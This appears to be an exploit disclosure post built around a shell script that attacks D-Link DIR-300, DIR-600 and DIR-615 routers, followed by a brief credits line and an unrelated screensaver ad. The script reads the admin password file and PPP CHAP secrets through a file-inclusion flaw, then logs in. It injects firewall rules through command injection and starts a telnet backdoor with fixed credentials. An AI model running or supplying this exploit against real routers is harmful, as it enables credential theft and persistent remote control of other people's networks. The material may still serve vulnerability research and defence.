General info: ============= A lot have been already said about SOHO routers. Thus, without further ado another nail in the coffin. knock knock =========== -- cut #!/bin/sh if [ -z "$1" ]; then echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)"; echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b"; echo "usage: $0 [router address] [telnet port]"; exit 0; fi; if [ -z "$2" ]; then TPORT=3333; else TPORT=$2; fi UPORT=31337; echo "Trying $1 ..."; HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" | grep -A1 "
" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`; if [ ! -z "$HTTPASSWD" ]; then L=`echo $HTTPASSWD | cut -d' ' -f1`; P=`echo $HTTPASSWD | cut -d' ' -f2`; echo "found username: $L"; echo "found password: $P"; curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php" | grep -v "fail" 1>/dev/null; if [ $? -eq 0 ]; then curl -sS "http://$1/tools_system.xgi?random_num=2011. -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null; curl -sS "http://$1/tools_system.xgi?random_num=2011. -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null; curl -sS "http://$1/tools_system.xgi?random_num=2011. -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null; echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..." curl -sS "http://$1/logout.php" 1>/dev/null; fi fi CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets" | grep -A1 "
" | sed -e "s/
//g"`; if [ ! -z "$CHAP" ]; then echo "found chap-secrets: $CHAP"; fi echo "Bye bye."; exit 0; -- cut Credits: ======== echo $use_the_source_luke ____________________________________________________________ FREE 3D MARINE AQUARIUM SCREENSAVER - Watch dolphins, sharks & orcas on your desktop! Check it out at